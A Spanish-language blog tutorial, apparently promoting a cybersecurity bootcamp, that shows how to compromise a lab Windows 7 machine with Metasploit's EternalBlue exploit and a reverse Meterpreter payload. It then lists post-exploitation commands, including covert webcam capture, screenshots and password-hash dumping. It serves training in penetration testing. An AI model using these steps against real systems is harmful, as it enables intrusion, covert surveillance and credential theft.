¿Cómo usar Meterpreter en ejercicios de hacking ético? ¿Para qué se despliega este payload en auditorías de seguridad?
Meterpreter es un payload que permite obtener acceso remoto a una máquina vulnerada. Además, es un programa que opera en un nivel muy bajo de los ordenadores y, por eso, es demasiado difícil de detectar. Entonces, se trata de un código malicioso que permite ejecutar cualquier tarea en una máquina infectada. ¿Cómo y, sobre todo, con qué fines se utiliza este programa en ciberseguridad?
El hacking ético o pentesting se encarga de replicar las técnicas de un ciberatacante real. Sin esta disciplina, no sería posible poner a prueba la seguridad de un sistema. El pentesting permite desarrollar conocimientos de forma anticipada con el fin de evitar las acciones que cometería un hacker malicioso.
Para entender el verdadero riesgo de una falla de seguridad, es necesario entender cómo explotarla y medir el impacto de un ataque cibernético. Los grupos de investigadores de seguridad que se especializan en hacer hacking ético también se conocen en bajo el nombre de red team.
En este post, veremos una técnica de red teaming que consiste en explotar la vulnerabilidad de una máquina y, después, ejecutar un payload para controlarla de manera remota. A continuación, veremos cómo usar Meterpreter con el framework de Metasploit.
¿Cómo usar Meterpreter?
Antes de enseñarte cómo usar Meterpreter, es necesario aclarar que el siguiente tutorial está hecho con fines educativos. El uso malicioso de las siguientes técnicas está sancionado por la ley. No obstante, su uso con fines éticos ayuda a mejorar el nivel de seguridad de un sistema.
- El primer paso para este ejercicio es crear dos máquinas virtuales con un software de virtualización. Una de ellas deberá tener un sistema operativo Windows 7 versión 2011 o 2012; la otra, el sistema operativo para seguridad informática Kali Linux.
- Para abrir la consola de Metasploit en Kali Linux, utiliza el comando:
msfconsole
- Para elegir el exploit que utilizaremos, ejecuta el comando:
use exploit/windows/smb/ms17_010_eternalblue
- Para ver las variables que es necesario definir para que el exploit se ejecute, utiliza el comando:
show options
- Para establecer las variables requeridas de este exploit, ejecuta los comandos:
set LPORT 4444 set RHOSTS <dirección IP de la máquina Win7>
🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴
Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada
👉 Prueba gratis el Bootcamp en Ciberseguridad por una semanaEl valor LPORT será el puerto local de tu máquina con Kali, que servirá para que el ordenador vulnerado se conecte a ti. El valor RHOSTS debe establecer la dirección IP de la máquina con Windows 7, la cual puedes averiguar con Nmap o, sencillamente, ejecutando el comando ipconfig en una terminal del sistema Win7.
- Para elegir un payload de tipo Meterpreter, asegúrate de que la palabra “meterpreter” se encuentra en la ruta del módulo. Para encontrar uno que se ajuste a tus necesidades, utiliza el comando “search“. Por ejemplo, así:
search payload windows
- Copia la ruta del módulo y ejecútalo con el comando “set payload”. El comando se vería del siguiente modo en la consola:
set payload windows/x64/meterpreter/reverse_http
- Finalmente, para ejecutar el exploit junto con el payload, utiliza el comando:
exploit
Comandos de Meterpreter
El siguiente paso de cómo usar Metepreter se basa en entender las funciones de sus comandos.
- Para ver toda la lista de comandos, ejecuta la opción:
help
- Para ejecutar el payload en segundo plano y hacer otras tareas mientras tanto, usa el comando:
backround
- Para ver tus sesiones de postexplotación, usa:
sessions
- Para acceder a una de ellas, utiliza la estructura:
sessions -i 1
- Para ver información básica del equipo explotado:
sysinfo
- Para ver información sobre sus direcciones IP:
ipconfig
- Para ver todos los procesos, qué usuario y qué fichero los ejecutó:
ps
- Para ver el nivel de privilegios con el que estás ejecutando el payload:
getuid
- Para ver un listado de las webcams conectadas al equipo:
webcam_list
- Para tomar una foto instantánea con la webcam:
webcam_snap
- Para ver una transmisión de vídeo en vivo desde la webcam:
webcam_stream
- Para tomar una captura de la pantalla en ese momento:
screenshot
- Para ver las funciones hash de las contraseñas de los usuarios:
hashdump
Estos son solo algunos de los comandos más interesantes para comenzar a aprender cómo usar Meterpreter para Windows. En conclusión, se trata de un payload con alcances muy significativos y, en pentesting, permite poner a prueba el nivel de peligro de una vulnerabilidad.
¿Cómo aprender más?
Si quieres aprender mucho más sobre cómo usar Meterpreter y otras herramientas similares, te interesará la formación intensiva que pueden encontrar en el Ciberseguridad Full Stack Bootcamp. ¿Te gustaría impulsar tu vida profesional y convertirte en todo un experto en pocos meses? ¡No te lo pienses más y pide más información!